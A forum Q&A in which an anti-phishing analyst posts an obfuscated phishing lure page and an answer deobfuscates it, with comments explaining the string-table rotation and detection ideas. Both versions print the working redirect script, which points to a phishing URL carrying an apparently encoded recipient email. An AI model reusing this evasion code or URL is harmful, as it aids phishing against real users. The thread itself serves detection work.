Figuring out a phishing redirection hidden in web source code


I work at an anti-phishing company and I've stumbled on a case that managed to evade our JCrawler. I tried to understand the code and what the attacker did here to stay undetected, but I couldn't figure it out and got really confused.

How can I make sure our detection does not miss sites such as this one:

<!DOCTYPE html>
<html>
<title>Loading...</title>
<link rel="shortcut icon" href="favicon_a_eupayfgghqiai7k9sol6lg2.ico" />
    <body>
        <!-- Analyst note: the document has no visible content, only a "Loading..." title,
             a favicon and the inline script below. The script's sole effect is a
             client-side redirect; the method name and the destination are fetched
             from a shuffled string table by computed index, so neither appears next
             to "location" in the source text. -->
        <script>
            // String table: decoy entries of the form "<digits><letters>" plus the two strings
            // that matter, the destination URL and the method name 'replace'.
            // NOTE(review): the URL's `data` parameter looks Base64-encoded; in lures like this it
            // often identifies the recipient, so treat it as sensitive when sharing the sample.
            var _0x117d=['4gSLXgI','2815VEHvFQ','14927VMrRFI','180751tIiKtp','11OWCNOZ','264810PhaCGI','49788ekTpju','https://42m6lvv4qywlq97qagwvfhnvm.monakasatelyoum.com/69bd90c1d7eb4aea978f3b70b4c2ba01//-5D8nkf4Z8xowFj3dQseoEAXkZbuLZbhvqckbUQIUGexERLdh7SGIiPu2dFknWuLaNuPLXHFNrKVsxBbwZml4cYEzxyj9bgHiJ5Qw485IUD2zCeI7l64XLrI9g7ChMk1U5MYIuWxbXIcqzk9RWPV5iVrChffikJy47gqSntD7qDhUBRRu33pHKYqGcVGD3Yv7YVvoEiGy?data=c2hhbHNhbGxAYmFjYXJkaS5jb20=','53294CAvUWH','289945bcwcUH','68GhmPuA','replace','15KaunFV'];
            // Lookup helper: subtracts 0x108 (264) and indexes the table, so arguments
            // 0x108..0x114 address entries 0..12. The second parameter is never read.
            var _0x3d5f=function(_0x1853ca,_0x41286d){_0x1853ca=_0x1853ca-0x108;
                                                        var _0x117ddf=_0x117d[_0x1853ca];
                                                            return _0x117ddf;};
            // Second alias for the same lookup helper, used by the final location[...] call.
            var _0x37e4a6=_0x3d5f;
            // Rotation guard: parseInt reads the leading digits of sampled entries ('4gSLXgI' -> 4)
            // and combines them into a checksum. Until it equals 0x339a1 (211361) the first entry
            // is moved to the end (push(shift())); the catch branch performs the same rotation.
            // If the URL or 'replace' sits in a sampled slot the result is NaN and the test fails.
            (function(_0x5bb9bd,_0x286286){var _0xe278b9=_0x3d5f;
                                           while(!![])
                                                {try{var _0x2d8884=parseInt(_0xe278b9(0x10c))*-parseInt(_0xe278b9(0x111))+parseInt(_0xe278b9(0x10d))+-parseInt(_0xe278b9(0x112))*parseInt(_0xe278b9(0x10e))+-parseInt(_0xe278b9(0x109))+parseInt(_0xe278b9(0x113))*parseInt(_0xe278b9(0x110))+-parseInt(_0xe278b9(0x114))+parseInt(_0xe278b9(0x108))*parseInt(_0xe278b9(0x10a));
                                                     if(_0x2d8884===_0x286286)
                                                         break;
                                                     else _0x5bb9bd['push'](_0x5bb9bd['shift']());}
                                                 catch(_0x54c267){_0x5bb9bd['push'](_0x5bb9bd['shift']());}}}(_0x117d,0x339a1),location[_0x37e4a6(0x10f)](_0x37e4a6(0x10b)));      
            // With the table as listed, the checksum matches after four rotations; slot 7
            // (0x10f - 0x108) is then 'replace' and slot 3 (0x10b - 0x108) is the URL, so the
            // comma-joined call above is location.replace(url). location.replace also drops the
            // lure page from session history.
            // Detection note: matching on the page text has little to anchor on here. Rendering
            // the page in an instrumented browser and recording the navigation target observes
            // the redirect regardless of how the strings are shuffled. A body that holds nothing
            // but a script and navigates immediately is a useful triage signal of its own.
</script>
   </body>
</html> 


There are 1 best solutions below


This looks like the output of a JavaScript obfuscator, right? Here is the same script after running it through a deobfuscator/beautifier:

// Analyst summary: this script only performs a client-side redirect. Once the
// string table below has been rotated into place, the last statement is
// equivalent to location.replace(<the https:// entry of the table>).
// NOTE(review): the readable local names (_getCompositionValue, toMonths,
// oldPassword, userPsd) do not appear in the raw page and look like labels
// invented by the deobfuscation tool; they say nothing about intent.
'use strict';
// String table: decoy entries of the form "<digits><letters>" plus the two
// strings that matter, the destination URL and the method name "replace".
// NOTE(review): the URL's `data` parameter looks Base64-encoded; in lures like
// this it often identifies the recipient, so treat it as sensitive when
// sharing the sample.
var _0x117d = ["4gSLXgI", "2815VEHvFQ", "14927VMrRFI", "180751tIiKtp", "11OWCNOZ", "264810PhaCGI", "49788ekTpju", "https://42m6lvv4qywlq97qagwvfhnvm.monakasatelyoum.com/69bd90c1d7eb4aea978f3b70b4c2ba01//-5D8nkf4Z8xowFj3dQseoEAXkZbuLZbhvqckbUQIUGexERLdh7SGIiPu2dFknWuLaNuPLXHFNrKVsxBbwZml4cYEzxyj9bgHiJ5Qw485IUD2zCeI7l64XLrI9g7ChMk1U5MYIuWxbXIcqzk9RWPV5iVrChffikJy47gqSntD7qDhUBRRu33pHKYqGcVGD3Yv7YVvoEiGy?data=c2hhbHNhbGxAYmFjYXJkaS5jb20=", "53294CAvUWH", "289945bcwcUH", "68GhmPuA", "replace", "15KaunFV"];
// Lookup helper: subtracts 264 and indexes the table, so call arguments
// 264..276 address entries 0..12. The incoming `value` argument is never read;
// the name is immediately reused for the table entry.
var _0x3d5f = function _getCompositionValue(key, value) {
key = key - 264;
var value = _0x117d[key];
return value;
};
// Second alias for the same lookup helper, used by the final statement.
var _0x37e4a6 = _0x3d5f;
// Rotation guard: keeps rotating the table until an arithmetic checksum over
// its numeric-looking entries equals the constant passed as `oldPassword`.
(function(data, oldPassword) {
var toMonths = _0x3d5f;
// `!![]` is simply `true`: loop until the checksum matches.
for (; !![];) {
try {
// parseInt reads the leading digits of each sampled entry ("4gSLXgI" -> 4).
// If the URL or "replace" sits in a sampled slot the result is NaN and the
// comparison below fails.
var userPsd = parseInt(toMonths(268)) * -parseInt(toMonths(273)) + parseInt(toMonths(269)) + -parseInt(toMonths(274)) * parseInt(toMonths(270)) + -parseInt(toMonths(265)) + parseInt(toMonths(275)) * parseInt(toMonths(272)) + -parseInt(toMonths(276)) + parseInt(toMonths(264)) * parseInt(toMonths(266));
if (userPsd === oldPassword) {
break;
} else {
// Wrong order: move the first entry to the end and try again.
data["push"](data["shift"]());
}
} catch (_0x54c267) {
// Same rotation if evaluating the checksum throws.
data["push"](data["shift"]());
}
}
// With the table as listed, the checksum equals 211361 after four rotations.
// Slot 7 (271 - 264) is then "replace" and slot 3 (267 - 264) is the URL, so the
// comma-joined call below is location.replace(url). location.replace also drops
// the lure page from session history.
// Detection note: the method name and destination are resolved only at run
// time, so matching on the page text has little to anchor on. Rendering the
// page in an instrumented browser and recording the navigation target observes
// the redirect regardless of how the strings are shuffled.
})(_0x117d, 211361), location[_0x37e4a6(271)](_0x37e4a6(267));